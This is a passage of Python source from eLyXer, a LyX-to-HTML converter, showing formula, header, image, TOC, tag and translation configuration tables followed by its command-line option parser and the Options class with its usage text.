u'\\color': [u'{$p!}{$1}', u'f0{$1}', u'span style="color: $p;"',],
u'\\colorbox': [u'{$p!}{$1}', u'f0{$1}', u'span class="colorbox" style="background: $p;"',],
u'\\dbinom': [u'{$1}{$2}', u'(f0{f1{f2{$1}}f1{f2{ }}f1{f2{$2}}})', u'span class="binomial"', u'span class="binomrow"', u'span class="binomcell"',],
u'\\dfrac': [u'{$1}{$2}', u'f0{f3{(}f1{$1}f3{)/(}f2{$2}f3{)}}', u'span class="fullfraction"', u'span class="numerator"', u'span class="denominator"', u'span class="ignored"',],
u'\\displaystyle': [u'{$1}', u'f0{$1}', u'span class="displaystyle"',],
u'\\fancyfoot': [u'[$p!]{$q!}', u'f0{}', u'ignored',],
u'\\fancyhead': [u'[$p!]{$q!}', u'f0{}', u'ignored',],
u'\\fbox': [u'{$1}', u'f0{$1}', u'span class="fbox"',],
u'\\fboxrule': [u'{$p!}', u'f0{}', u'ignored',],
u'\\fboxsep': [u'{$p!}', u'f0{}', u'ignored',],
u'\\fcolorbox': [u'{$p!}{$q!}{$1}', u'f0{$1}', u'span class="boxed" style="border-color: $p; background: $q;"',],
u'\\frac': [u'{$1}{$2}', u'f0{f3{(}f1{$1}f3{)/(}f2{$2}f3{)}}', u'span class="fraction"', u'span class="numerator"', u'span class="denominator"', u'span class="ignored"',],
u'\\framebox': [u'[$p!][$q!]{$1}', u'f0{$1}', u'span class="framebox align-$q" style="width: $p;"',],
u'\\frontmatter': [u'', u'f0{}', u'ignored',],
u'\\href': [u'[$o]{$u!}{$t!}', u'f0{$t}', u'a href="$u"',],
u'\\hspace': [u'{$p!}', u'f0{ }', u'span class="hspace" style="width: $p;"',],
u'\\leftroot': [u'{$p!}', u'f0{ }', u'span class="leftroot" style="width: $p;px"',],
u'\\mainmatter': [u'', u'f0{}', u'ignored',],
u'\\markboth': [u'{$p!}{$q!}', u'f0{}', u'ignored',],
u'\\markright': [u'{$p!}', u'f0{}', u'ignored',],
u'\\nicefrac': [u'{$1}{$2}', u'f0{f1{$1}⁄f2{$2}}', u'span class="fraction"', u'sup class="numerator"', u'sub class="denominator"', u'span class="ignored"',],
u'\\parbox': [u'[$p!]{$w!}{$1}', u'f0{1}', u'div class="Boxed" style="width: $w;"',],
u'\\raisebox': [u'{$p!}{$1}', u'f0{$1.font}', u'span class="raisebox" style="vertical-align: $p;"',],
u'\\renewenvironment': [u'{$1!}{$2!}{$3!}', u'',],
u'\\rule': [u'[$v!]{$w!}{$h!}', u'f0/', u'hr class="line" style="width: $w; height: $h;"',],
u'\\scriptscriptstyle': [u'{$1}', u'f0{$1}', u'span class="scriptscriptstyle"',],
u'\\scriptstyle': [u'{$1}', u'f0{$1}', u'span class="scriptstyle"',],
u'\\sqrt': [u'[$0]{$1}', u'f0{f1{$0}f2{√}f4{(}f3{$1}f4{)}}', u'span class="sqrt"', u'sup class="root"', u'span class="radical"', u'span class="root"', u'span class="ignored"',],
u'\\stackrel': [u'{$1}{$2}', u'f0{f1{$1}f2{$2}}', u'span class="stackrel"', u'span class="upstackrel"', u'span class="downstackrel"',],
u'\\tbinom': [u'{$1}{$2}', u'(f0{f1{f2{$1}}f1{f2{ }}f1{f2{$2}}})', u'span class="binomial"', u'span class="binomrow"', u'span class="binomcell"',],
u'\\textcolor': [u'{$p!}{$1}', u'f0{$1}', u'span style="color: $p;"',],
u'\\textstyle': [u'{$1}', u'f0{$1}', u'span class="textstyle"',],
u'\\thispagestyle': [u'{$p!}', u'f0{}', u'ignored',],
u'\\unit': [u'[$0]{$1}', u'$0f0{$1.font}', u'span class="unit"',],
u'\\unitfrac': [u'[$0]{$1}{$2}', u'$0f0{f1{$1.font}⁄f2{$2.font}}', u'span class="fraction"', u'sup class="unit"', u'sub class="unit"',],
u'\\uproot': [u'{$p!}', u'f0{ }', u'span class="uproot" style="width: $p;px"',],
u'\\url': [u'{$u!}', u'f0{$u}', u'a href="$u"',],
u'\\vspace': [u'{$p!}', u'f0{ }', u'span class="vspace" style="height: $p;"',],
}
# Remaining formula-configuration tables of the enclosing class (its header
# is above this excerpt).  Keys are TeX commands or single characters; the
# values drive their translation to HTML/Unicode.

# NOTE(review): values look like size expressions over the command's bracket
# parameters ($1, $2) — confirm against the consumer of hybridsizes.
hybridsizes = {
u'\\binom': u'$1+$2', u'\\cfrac': u'$1+$2', u'\\dbinom': u'$1+$2+1',
u'\\dfrac': u'$1+$2', u'\\frac': u'$1+$2', u'\\tbinom': u'$1+$2+1',
}
# Commands that emit an HTML anchor; '#' presumably stands for the label name.
labelfunctions = {
u'\\label': u'a name="#"',
}
# Commands shown as a single Unicode symbol that can carry limits
# (sub/superscripts), e.g. sums and integrals.
limitcommands = {
u'\\biginterleave': u'⫼', u'\\bigsqcap': u'⨅', u'\\fint': u'⨏',
u'\\iiiint': u'⨌', u'\\int': u'∫', u'\\intop': u'∫', u'\\lim': u'lim',
u'\\prod': u'∏', u'\\smallint': u'∫', u'\\sqint': u'⨖', u'\\sum': u'∑',
u'\\varointclockwise': u'∲', u'\\varprod': u'⨉', u'\\zcmp': u'⨟',
u'\\zhide': u'⧹', u'\\zpipe': u'⨠', u'\\zproject': u'⨡',
}
# Commands dispatched to dedicated handler classes; the value appears to be
# the handler's name — verify against the command factory.
misccommands = {
u'\\limits': u'LimitPreviousCommand', u'\\newcommand': u'MacroDefinition',
u'\\renewcommand': u'MacroDefinition',
u'\\setcounter': u'SetCounterFunction', u'\\tag': u'FormulaTag',
u'\\tag*': u'FormulaTag', u'\\today': u'TodayCommand',
}
# Single characters rewritten on output (spacing around operators, typographic
# replacements, characters dropped entirely).
modified = {
u'\n': u'', u' ': u'', u'$': u'', u'&': u' ', u'\'': u'’', u'+': u' + ',
u',': u', ', u'-': u' − ', u'/': u' ⁄ ', u':': u' : ', u'<': u' < ',
u'=': u' = ', u'>': u' > ', u'@': u'', u'~': u'',
}
# One-parameter commands wrapped in the given HTML tag.
onefunctions = {
u'\\Big': u'span class="bigsymbol"', u'\\Bigg': u'span class="hugesymbol"',
u'\\bar': u'span class="bar"', u'\\begin{array}': u'span class="arraydef"',
u'\\big': u'span class="symbol"', u'\\bigg': u'span class="largesymbol"',
u'\\bigl': u'span class="bigsymbol"', u'\\bigr': u'span class="bigsymbol"',
u'\\centering': u'span class="align-center"',
u'\\ensuremath': u'span class="ensuremath"',
u'\\hphantom': u'span class="phantom"',
u'\\noindent': u'span class="noindent"',
u'\\overbrace': u'span class="overbrace"',
u'\\overline': u'span class="overline"',
u'\\phantom': u'span class="phantom"',
u'\\underbrace': u'span class="underbrace"', u'\\underline': u'u',
u'\\vphantom': u'span class="phantom"',
}
# Relational/arrow commands mapped to their Unicode symbol; per the name,
# these are presumably rendered with surrounding spacing.
spacedcommands = {
u'\\Bot': u'⫫', u'\\Doteq': u'≑', u'\\DownArrowBar': u'⤓',
u'\\DownLeftTeeVector': u'⥞', u'\\DownLeftVectorBar': u'⥖',
u'\\DownRightTeeVector': u'⥟', u'\\DownRightVectorBar': u'⥗',
u'\\Equal': u'⩵', u'\\LeftArrowBar': u'⇤', u'\\LeftDownTeeVector': u'⥡',
u'\\LeftDownVectorBar': u'⥙', u'\\LeftTeeVector': u'⥚',
u'\\LeftTriangleBar': u'⧏', u'\\LeftUpTeeVector': u'⥠',
u'\\LeftUpVectorBar': u'⥘', u'\\LeftVectorBar': u'⥒',
u'\\Leftrightarrow': u'⇔', u'\\Longmapsfrom': u'⟽', u'\\Longmapsto': u'⟾',
u'\\MapsDown': u'↧', u'\\MapsUp': u'↥', u'\\Nearrow': u'⇗',
u'\\NestedGreaterGreater': u'⪢', u'\\NestedLessLess': u'⪡',
u'\\NotGreaterLess': u'≹', u'\\NotGreaterTilde': u'≵',
u'\\NotLessTilde': u'≴', u'\\Nwarrow': u'⇖', u'\\Proportion': u'∷',
u'\\RightArrowBar': u'⇥', u'\\RightDownTeeVector': u'⥝',
u'\\RightDownVectorBar': u'⥕', u'\\RightTeeVector': u'⥛',
u'\\RightTriangleBar': u'⧐', u'\\RightUpTeeVector': u'⥜',
u'\\RightUpVectorBar': u'⥔', u'\\RightVectorBar': u'⥓',
u'\\Rightarrow': u'⇒', u'\\Same': u'⩶', u'\\Searrow': u'⇘',
u'\\Swarrow': u'⇙', u'\\Top': u'⫪', u'\\UpArrowBar': u'⤒', u'\\VDash': u'⊫',
u'\\approx': u'≈', u'\\approxeq': u'≊', u'\\backsim': u'∽', u'\\barin': u'⋶',
u'\\barleftharpoon': u'⥫', u'\\barrightharpoon': u'⥭', u'\\bij': u'⤖',
u'\\coloneq': u'≔', u'\\corresponds': u'≙', u'\\curlyeqprec': u'⋞',
u'\\curlyeqsucc': u'⋟', u'\\dashrightarrow': u'⇢', u'\\dlsh': u'↲',
u'\\downdownharpoons': u'⥥', u'\\downuparrows': u'⇵',
u'\\downupharpoons': u'⥯', u'\\drsh': u'↳', u'\\eqslantgtr': u'⪖',
u'\\eqslantless': u'⪕', u'\\equiv': u'≡', u'\\ffun': u'⇻', u'\\finj': u'⤕',
u'\\ge': u'≥', u'\\geq': u'≥', u'\\ggcurly': u'⪼', u'\\gnapprox': u'⪊',
u'\\gneq': u'⪈', u'\\gtrapprox': u'⪆', u'\\hash': u'⋕', u'\\iddots': u'⋰',
u'\\implies': u' ⇒ ', u'\\in': u'∈', u'\\le': u'≤', u'\\leftarrow': u'←',
u'\\leftarrowtriangle': u'⇽', u'\\leftbarharpoon': u'⥪',
u'\\leftrightarrowtriangle': u'⇿', u'\\leftrightharpoon': u'⥊',
u'\\leftrightharpoondown': u'⥐', u'\\leftrightharpoonup': u'⥎',
u'\\leftrightsquigarrow': u'↭', u'\\leftslice': u'⪦',
u'\\leftsquigarrow': u'⇜', u'\\leftupdownharpoon': u'⥑', u'\\leq': u'≤',
u'\\lessapprox': u'⪅', u'\\llcurly': u'⪻', u'\\lnapprox': u'⪉',
u'\\lneq': u'⪇', u'\\longmapsfrom': u'⟻', u'\\multimapboth': u'⧟',
u'\\multimapdotbothA': u'⊶', u'\\multimapdotbothB': u'⊷',
u'\\multimapinv': u'⟜', u'\\nVdash': u'⊮', u'\\ne': u'≠', u'\\neq': u'≠',
u'\\ngeq': u'≱', u'\\nleq': u'≰', u'\\nni': u'∌', u'\\not\\in': u'∉',
u'\\notasymp': u'≭', u'\\npreceq': u'⋠', u'\\nsqsubseteq': u'⋢',
u'\\nsqsupseteq': u'⋣', u'\\nsubset': u'⊄', u'\\nsucceq': u'⋡',
u'\\pfun': u'⇸', u'\\pinj': u'⤔', u'\\precapprox': u'⪷', u'\\preceqq': u'⪳',
u'\\precnapprox': u'⪹', u'\\precnsim': u'⋨', u'\\propto': u'∝',
u'\\psur': u'⤀', u'\\rightarrow': u'→', u'\\rightarrowtriangle': u'⇾',
u'\\rightbarharpoon': u'⥬', u'\\rightleftharpoon': u'⥋',
u'\\rightslice': u'⪧', u'\\rightsquigarrow': u'⇝',
u'\\rightupdownharpoon': u'⥏', u'\\sim': u'~', u'\\strictfi': u'⥼',
u'\\strictif': u'⥽', u'\\subset': u'⊂', u'\\subseteq': u'⊆',
u'\\subsetneq': u'⊊', u'\\succapprox': u'⪸', u'\\succeqq': u'⪴',
u'\\succnapprox': u'⪺', u'\\supset': u'⊃', u'\\supseteq': u'⊇',
u'\\supsetneq': u'⊋', u'\\times': u'×', u'\\to': u'→',
u'\\updownarrows': u'⇅', u'\\updownharpoons': u'⥮', u'\\upupharpoons': u'⥣',
u'\\vartriangleleft': u'⊲', u'\\vartriangleright': u'⊳',
}
# Token prefixes that open each kind of formula construct.
starts = {
u'beginafter': u'}', u'beginbefore': u'\\begin{', u'bracket': u'{',
u'command': u'\\', u'comment': u'%', u'complex': u'\\[', u'simple': u'$',
u'squarebracket': u'[', u'unnumbered': u'*',
}
# Script characters mapped to their HTML tags.
symbolfunctions = {
u'^': u'sup', u'_': u'sub',
}
# Text-mode commands mapped to their wrapping HTML tag.
textfunctions = {
u'\\mbox': u'span class="mbox"', u'\\text': u'span class="text"',
u'\\textbf': u'b', u'\\textipa': u'span class="textipa"', u'\\textit': u'i',
u'\\textnormal': u'span class="textnormal"',
u'\\textrm': u'span class="textrm"',
u'\\textsc': u'span class="versalitas"',
u'\\textsf': u'span class="textsf"', u'\\textsl': u'i', u'\\texttt': u'tt',
u'\\textup': u'span class="normal"',
}
# Characters passed through to the output untouched.
unmodified = {
u'characters': [u'.', u'*', u'€', u'(', u')', u'[', u']', u'·', u'!', u';', u'|', u'§', u'"',],
}
# External service endpoints (used when rendering formulas as images).
urls = {
u'googlecharts': u'http://chart.googleapis.com/chart?cht=tx&chl=',
}
# Release metadata for this eLyXer build (version number, release date and
# the highest LyX file format it understands).
class GeneralConfig(object):
"Configuration class from elyxer.config file"
version = {
u'date': u'2015-02-26', u'lyxformat': u'413', u'number': u'1.2.5',
}
# Keywords recognized in the LyX document header, plus the mapping from
# documentclass names to the two broad output styles (article vs book).
class HeaderConfig(object):
"Configuration class from elyxer.config file"
# LyX header directives and the keyword each parameter is stored under.
parameters = {
u'beginpreamble': u'\\begin_preamble', u'branch': u'\\branch',
u'documentclass': u'\\textclass', u'endbranch': u'\\end_branch',
u'endpreamble': u'\\end_preamble', u'language': u'\\language',
u'lstset': u'\\lstset', u'outputchanges': u'\\output_changes',
u'paragraphseparation': u'\\paragraph_separation',
u'pdftitle': u'\\pdf_title', u'secnumdepth': u'\\secnumdepth',
u'tocdepth': u'\\tocdepth',
}
# Known documentclass names grouped by the style they should render as.
styles = {
u'article': [u'article', u'aastex', u'aapaper', u'acmsiggraph', u'sigplanconf', u'achemso', u'amsart', u'apa', u'arab-article', u'armenian-article', u'article-beamer', u'chess', u'dtk', u'elsarticle', u'heb-article', u'IEEEtran', u'iopart', u'kluwer', u'scrarticle-beamer', u'scrartcl', u'extarticle', u'paper', u'mwart', u'revtex4', u'spie', u'svglobal3', u'ltugboat', u'agu-dtd', u'jgrga', u'agums', u'entcs', u'egs', u'ijmpc', u'ijmpd', u'singlecol-new', u'doublecol-new', u'isprs', u'tarticle', u'jsarticle', u'jarticle', u'jss', u'literate-article', u'siamltex', u'cl2emult', u'llncs', u'svglobal', u'svjog', u'svprobth',],
u'book': [u'book', u'amsbook', u'scrbook', u'extbook', u'tufte-book', u'report', u'extreport', u'scrreprt', u'memoir', u'tbook', u'jsbook', u'jbook', u'mwbk', u'svmono', u'svmult', u'treport', u'jreport', u'mwrep',],
}
# External image-conversion settings: command templates per converter,
# cropbox formats per extension, and the default/vector output formats.
class ImageConfig(object):
"Configuration class from elyxer.config file"
# Shell command templates; $input/$output/$scale/$format are substituted.
converters = {
u'imagemagick': u'convert[ -density $scale][ -define $format:use-cropbox=true] "$input" "$output"',
u'inkscape': u'inkscape "$input" --export-png="$output"',
u'lyx': u'lyx -C "$input" "$output"',
}
# File extensions mapped to the ImageMagick cropbox format name.
cropboxformats = {
u'.eps': u'ps', u'.pdf': u'pdf', u'.ps': u'ps',
}
# Default output extension and the extensions treated as vector formats.
formats = {
u'default': u'.png', u'vector': [u'.svg', u'.eps',],
}
# Container class names that may be grouped together inside a layout.
class LayoutConfig(object):
"Configuration class from elyxer.config file"
groupable = {
u'allowed': [u'StringContainer', u'Constant', u'TaggedText', u'Align', u'TextFamily', u'EmphaticText', u'VersalitasText', u'BarredText', u'SizeText', u'ColorText', u'LangLine', u'Formula',],
}
# Markers used by the newfangle literate-programming syntax.
class NewfangleConfig(object):
"Configuration class from elyxer.config file"
constants = {
u'chunkref': u'chunkref{', u'endcommand': u'}', u'endmark': u'>',
u'startcommand': u'\\', u'startmark': u'=<',
}
# Numbering scheme: which layouts get ordered (arabic) vs roman numbers,
# and the symbol sequence used for footnote markers.
class NumberingConfig(object):
"Configuration class from elyxer.config file"
layouts = {
u'ordered': [u'Chapter', u'Section', u'Subsection', u'Subsubsection', u'Paragraph',],
u'roman': [u'Part', u'Book',],
}
# Symbols cycled through when marking footnotes symbolically.
sequence = {
u'symbols': [u'*', u'**', u'†', u'‡', u'§', u'§§', u'¶', u'¶¶', u'#', u'##',],
}
# Inline style tables: horizontal spaces, quote glyphs per language style,
# cross-reference formats, ignored size units and vertical skips.
class StyleConfig(object):
"Configuration class from elyxer.config file"
# LaTeX horizontal-space commands and their HTML replacement.
hspaces = {
u'\\enskip{}': u' ', u'\\hfill{}': u'<span class="hfill"> </span>',
u'\\hspace*{\\fill}': u' ', u'\\hspace*{}': u'', u'\\hspace{}': u' ',
u'\\negthinspace{}': u'', u'\\qquad{}': u' ', u'\\quad{}': u' ',
u'\\space{}': u' ', u'\\thinspace{}': u' ', u'~': u' ',
}
# Quote glyphs keyed by a two/three-letter code (language + left/right +
# double/single) — e.g. 'eld' = english left double.
quotes = {
u'ald': u'»', u'als': u'›', u'ard': u'«', u'ars': u'‹', u'eld': u'“',
u'els': u'‘', u'erd': u'”', u'ers': u'’', u'fld': u'«',
u'fls': u'‹', u'frd': u'»', u'frs': u'›', u'gld': u'„', u'gls': u'‚',
u'grd': u'“', u'grs': u'‘', u'pld': u'„', u'pls': u'‚', u'prd': u'”',
u'prs': u'’', u'sld': u'”', u'srd': u'”',
}
# Templates for each \ref variant; '@', '#', '¶', '$' and '↕' are
# presumably placeholders filled in by the reference formatter — confirm.
referenceformats = {
u'eqref': u'(@↕)', u'formatted': u'¶↕', u'nameref': u'$↕', u'pageref': u'#↕',
u'ref': u'@↕', u'vpageref': u'on-page#↕', u'vref': u'@on-page#↕',
}
# Size suffixes that are dropped when converting lengths.
size = {
u'ignoredtexts': [u'col', u'text', u'line', u'page', u'theight', u'pheight',],
}
# LaTeX vertical skips and the HTML block that replaces each.
vspaces = {
u'bigskip': u'<div class="bigskip"> </div>',
u'defskip': u'<div class="defskip"> </div>',
u'medskip': u'<div class="medskip"> </div>',
u'smallskip': u'<div class="smallskip"> </div>',
u'vfill': u'<div class="vfill"> </div>',
}
# Container-extraction configs (allowed/cloned/extracted class-name lists,
# consumed by ContainerExtractor) used when building the table of contents.
class TOCConfig(object):
"Configuration class from elyxer.config file"
extractplain = {
u'allowed': [u'StringContainer', u'Constant', u'TaggedText', u'Align', u'TextFamily', u'EmphaticText', u'VersalitasText', u'BarredText', u'SizeText', u'ColorText', u'LangLine', u'Formula',],
u'cloned': [u'',], u'extracted': [u'',],
}
extracttitle = {
u'allowed': [u'StringContainer', u'Constant', u'Space',],
u'cloned': [u'TextFamily', u'EmphaticText', u'VersalitasText', u'BarredText', u'SizeText', u'ColorText', u'LangLine', u'Formula',],
u'extracted': [u'PlainLayout', u'TaggedText', u'Align', u'Caption', u'StandardLayout', u'FlexInset',],
}
# HTML tags (or tag + attribute strings) for the various LyX text
# constructs: families, flex insets, layouts, lists, notes, scripts, shapes.
class TagConfig(object):
"Configuration class from elyxer.config file"
barred = {
u'under': u'u',
}
family = {
u'sans': u'span class="sans"', u'typewriter': u'tt',
}
flex = {
u'CharStyle:Code': u'span class="code"',
u'CharStyle:MenuItem': u'span class="menuitem"',
u'Code': u'span class="code"', u'MenuItem': u'span class="menuitem"',
u'Noun': u'span class="noun"', u'Strong': u'span class="strong"',
}
group = {
u'layouts': [u'Quotation', u'Quote',],
}
# 'h?' presumably means the heading level is computed at runtime — confirm
# against the layout numbering code.
layouts = {
u'Center': u'div', u'Chapter': u'h?', u'Date': u'h2', u'Paragraph': u'div',
u'Part': u'h1', u'Quotation': u'blockquote', u'Quote': u'blockquote',
u'Section': u'h?', u'Subsection': u'h?', u'Subsubsection': u'h?',
}
listitems = {
u'Enumerate': u'ol', u'Itemize': u'ul',
}
# Note variants mapped to a tag; empty string means the note is dropped.
notes = {
u'Comment': u'', u'Greyedout': u'span class="greyedout"', u'Note': u'',
}
script = {
u'subscript': u'sub', u'superscript': u'sup',
}
shaped = {
u'italic': u'i', u'slanted': u'i', u'smallcaps': u'span class="versalitas"',
}
# Default (English) strings for generated text, plus the mapping from LyX
# language names to two-letter HTML language codes.
class TranslationConfig(object):
"Configuration class from elyxer.config file"
constants = {
u'Appendix': u'Appendix', u'Book': u'Book', u'Chapter': u'Chapter',
u'Paragraph': u'Paragraph', u'Part': u'Part', u'Section': u'Section',
u'Subsection': u'Subsection', u'Subsubsection': u'Subsubsection',
u'abstract': u'Abstract', u'bibliography': u'Bibliography',
u'figure': u'figure', u'float-algorithm': u'Algorithm ',
u'float-figure': u'Figure ', u'float-listing': u'Listing ',
u'float-table': u'Table ', u'float-tableau': u'Tableau ',
u'footnotes': u'Footnotes', u'generated-by': u'Document generated by ',
u'generated-on': u' on ', u'index': u'Index',
u'jsmath-enable': u'Please enable JavaScript on your browser.',
u'jsmath-requires': u' requires JavaScript to correctly process the mathematics on this page. ',
u'jsmath-warning': u'Warning: ', u'list-algorithm': u'List of Algorithms',
u'list-figure': u'List of Figures', u'list-table': u'List of Tables',
u'list-tableau': u'List of Tableaux', u'main-page': u'Main page',
u'next': u'Next', u'nomenclature': u'Nomenclature',
u'on-page': u' on page ', u'prev': u'Prev', u'references': u'References',
u'toc': u'Table of Contents', u'toc-for': u'Contents for ', u'up': u'Up',
}
languages = {
u'american': u'en', u'british': u'en', u'deutsch': u'de', u'dutch': u'nl',
u'english': u'en', u'french': u'fr', u'ngerman': u'de', u'russian': u'ru',
u'spanish': u'es',
}
class CommandLineParser(object):
    """Parses '--key value' style runtime options into an options object.

    parseoptions() returns None on success or an error message string on
    failure; recognized values are stored via setattr on the options object.
    """

    def __init__(self, options):
        "Remember the object whose attributes receive the parsed values."
        self.options = options

    def parseoptions(self, args):
        """Parse command line options from args (consumed in place).

        Returns None when everything parsed, or an error string describing
        the first unrecognized or incomplete option.
        """
        if len(args) == 0:
            return None
        while len(args) > 0 and args[0].startswith('--'):
            key, value = self.readoption(args)
            if not key:
                return 'Option ' + value + ' not recognized'
            if not value:
                return 'Option ' + key + ' needs a value'
            setattr(self.options, key, value)
        return None

    def readoption(self, args):
        """Read one option from args; return (key, value).

        Returns (None, key) for an unknown option and (key, None) when a
        required value is missing. Boolean options take no value and are
        simply switched on; list options accumulate values.
        """
        arg = args[0][2:]
        del args[0]
        if '=' in arg:
            key = self.readequalskey(arg, args)
        else:
            key = arg.replace('-', '')
        if not hasattr(self.options, key):
            return None, key
        current = getattr(self.options, key)
        if isinstance(current, bool):
            # flag option: presence means True, no value is consumed
            return key, True
        # read value
        if len(args) == 0:
            return key, None
        if args[0].startswith('"'):
            initial = args[0]
            del args[0]
            return key, self.readquoted(args, initial)
        value = args[0]
        if isinstance(value, bytes):
            # Python 2 sys.argv holds byte strings; decode them as UTF-8.
            # (Python 3 already supplies str, which must not be decoded.)
            value = value.decode('utf-8')
        del args[0]
        if isinstance(current, list):
            current.append(value)
            return key, current
        return key, value

    def readquoted(self, args, initial):
        """Read a multi-word value between double quotes.

        'initial' is the first token (starting with '"'); further tokens
        are consumed until one ends with '"'. Returns None for an
        unterminated quote.

        Fixes over the previous version: the closing token is now sliced
        with args[0][:-1] (args[0:-1] was a list and raised TypeError),
        the closing token is consumed from args, and two leftover debug
        Trace.error() calls were removed.
        """
        value = initial[1:]
        while len(args) > 0 and not args[0].endswith('"') and not args[0].startswith('--'):
            value += ' ' + args[0]
            del args[0]
        if len(args) == 0 or args[0].startswith('--'):
            # unterminated quote: signal the error to the caller
            return None
        # append the closing fragment without its trailing quote and consume it
        value += ' ' + args[0][:-1]
        del args[0]
        return value

    def readequalskey(self, arg, args):
        "Split '--key=value'; push the value back onto args and return the key."
        split = arg.split('=', 1)
        key = split[0]
        value = split[1]
        args.insert(0, value)
        return key
# Global runtime options. All attributes are class-level defaults that
# CommandLineParser overwrites in place (it setattr()s on the Options class
# object passed to it), so the whole program shares one option set.
class Options(object):
"A set of runtime options"
instance = None
# program location and output destination options
location = None
nocopy = False
copyright = False
debug = False
quiet = False
version = False
hardversion = False
versiondate = False
html = False
help = False
showlines = True
unicode = False
iso885915 = False
css = []
favicon = ''
title = None
directory = None
destdirectory = None
# table-of-contents options
toc = False
toctarget = ''
tocfor = None
forceformat = None
lyxformat = False
target = None
splitpart = None
memory = True
lowmem = False
nobib = False
converter = 'imagemagick'
raw = False
jsmath = None
mathjax = None
nofooter = False
simplemath = False
template = None
noconvert = False
notoclabels = False
# footnote rendering flags (mutually adjusted in parsefootnotes())
letterfoot = True
numberfoot = False
symbolfoot = False
hoverfoot = True
marginfoot = False
endfoot = False
supfoot = True
alignfoot = False
footnotes = None
imageformat = None
copyimages = False
googlecharts = False
embedcss = []
branches = dict()
def parseoptions(self, args):
# Delegates to CommandLineParser; note it passes the Options *class*, so
# parsed values become class attributes visible everywhere.
"Parse command line options"
Options.location = args[0]
del args[0]
parser = CommandLineParser(Options)
result = parser.parseoptions(args)
if result:
Trace.error(result)
self.usage()
self.processoptions()
def processoptions(self):
# Several branches below exit the process (usage()/show*() call
# sys.exit), so order matters here.
"Process all options parsed."
if Options.help:
self.usage()
if Options.version:
self.showversion()
if Options.hardversion:
self.showhardversion()
if Options.versiondate:
self.showversiondate()
if Options.lyxformat:
self.showlyxformat()
if Options.splitpart:
try:
Options.splitpart = int(Options.splitpart)
if Options.splitpart <= 0:
Trace.error('--splitpart requires a number bigger than zero')
self.usage()
# NOTE(review): bare except also hides unrelated errors; it is meant
# to catch the ValueError from int().
except:
Trace.error('--splitpart needs a numeric argument, not ' + Options.splitpart)
self.usage()
if Options.lowmem or Options.toc or Options.tocfor:
Options.memory = False
self.parsefootnotes()
if Options.forceformat and not Options.imageformat:
Options.imageformat = Options.forceformat
if Options.imageformat == 'copy':
Options.copyimages = True
if Options.css == []:
Options.css = ['http://elyxer.nongnu.org/lyx.css']
if Options.favicon == '':
pass # no default favicon
if Options.html:
Options.simplemath = True
if Options.toc and not Options.tocfor:
Trace.error('Option --toc is deprecated; use --tocfor "page" instead')
Options.tocfor = Options.toctarget
if Options.nocopy:
Trace.error('Option --nocopy is deprecated; it is no longer needed')
if Options.jsmath:
Trace.error('Option --jsmath is deprecated; use --mathjax instead')
# set in Trace if necessary
# Copies e.g. Options.debug onto Trace.debugmode for every *mode
# attribute that Trace exposes.
for param in dir(Trace):
if param.endswith('mode'):
setattr(Trace, param, getattr(self, param[:-4]))
def usage(self):
# Prints usage to stderr and exits via showoptions() -> sys.exit().
"Show correct usage"
Trace.error('Usage: ' + os.path.basename(Options.location) + ' [options] [filein] [fileout]')
Trace.error('Convert LyX input file "filein" to HTML file "fileout".')
Trace.error('If filein (or fileout) is not given use standard input (or output).')
Trace.error('Main program of the eLyXer package (http://elyxer.nongnu.org/).')
self.showoptions()
def parsefootnotes(self):
# Expands the comma-separated --footnotes list into the individual
# *foot boolean flags, with sensible fallbacks.
"Parse footnotes options."
if not Options.footnotes:
return
Options.marginfoot = False
Options.letterfoot = False
Options.hoverfoot = False
options = Options.footnotes.split(',')
for option in options:
footoption = option + 'foot'
if hasattr(Options, footoption):
setattr(Options, footoption, True)
else:
Trace.error('Unknown footnotes option: ' + option)
if not Options.endfoot and not Options.marginfoot and not Options.hoverfoot:
Options.hoverfoot = True
if not Options.numberfoot and not Options.symbolfoot:
Options.letterfoot = True
def showoptions(self):
# Help text goes through Trace.error (stderr) and ends the process.
"Show all possible options"
Trace.error('  Common options:')
Trace.error('    --help:                 show this online help')
Trace.error('    --quiet:                disables all runtime messages')
Trace.error('')
Trace.error('  Advanced options:')
Trace.error('    --debug:                enable debugging messages (for developers)')
Trace.error('    --version:              show version number and release date')
Trace.error('    --lyxformat:            return the highest LyX version supported')
Trace.error('  Options for HTML output:')
Trace.error('    --title "title":        set the generated page title')
Trace.error('    --css "file.css":       use a custom CSS file')
Trace.error('    --embedcss "file.css":  embed styles from a CSS file into the output')
Trace.error('    --favicon "icon.ico":   insert the specified favicon in the header.')
Trace.error('    --html:                 output HTML 4.0 instead of the default XHTML')
Trace.error('    --unicode:              full Unicode output')
Trace.error('    --iso885915:            output a document with ISO-8859-15 encoding')
Trace.error('    --nofooter:             remove the footer "generated by eLyXer"')
Trace.error('    --simplemath:           do not generate fancy math constructions')
Trace.error('  Options for image output:')
Trace.error('    --directory "img_dir":  look for images in the specified directory')
Trace.error('    --destdirectory "dest": put converted images into this directory')
Trace.error('    --imageformat ".ext":   image output format, or "copy" to copy images')
Trace.error('    --noconvert:            do not convert images, use in original locations')
Trace.error('    --converter "inkscape": use an alternative program to convert images')
Trace.error('  Options for footnote display:')
Trace.error('    --numberfoot:           mark footnotes with numbers instead of letters')
Trace.error('    --symbolfoot:           mark footnotes with symbols (*, **...)')
Trace.error('    --hoverfoot:            show footnotes as hovering text (default)')
Trace.error('    --marginfoot:           show footnotes on the page margin')
Trace.error('    --endfoot:              show footnotes at the end of the page')
Trace.error('    --supfoot:              use superscript for footnote markers (default)')
Trace.error('    --alignfoot:            use aligned text for footnote markers')
Trace.error('    --footnotes "options":  specify several comma-separated footnotes options')
Trace.error('      Available options are: "number", "symbol", "hover", "margin", "end",')
Trace.error('        "sup", "align"')
Trace.error('  Advanced output options:')
Trace.error('    --splitpart "depth":    split the resulting webpage at the given depth')
Trace.error('    --tocfor "page":        generate a TOC that points to the given page')
Trace.error('    --target "frame":       make all links point to the given frame')
Trace.error('    --notoclabels:          omit the part labels in the TOC, such as Chapter')
Trace.error('    --lowmem:               do the conversion on the fly (conserve memory)')
Trace.error('    --raw:                  generate HTML without header or footer.')
Trace.error('    --mathjax remote:       use MathJax remotely to display equations')
Trace.error('    --mathjax "URL":        use MathJax from the given URL to display equations')
Trace.error('    --googlecharts:         use Google Charts to generate formula images')
Trace.error('    --template "file":      use a template, put everything in <!--$content-->')
Trace.error('    --copyright:            add a copyright notice at the bottom')
Trace.error('  Deprecated options:')
Trace.error('    --toc:                  (deprecated) create a table of contents')
Trace.error('    --toctarget "page":     (deprecated) generate a TOC for the given page')
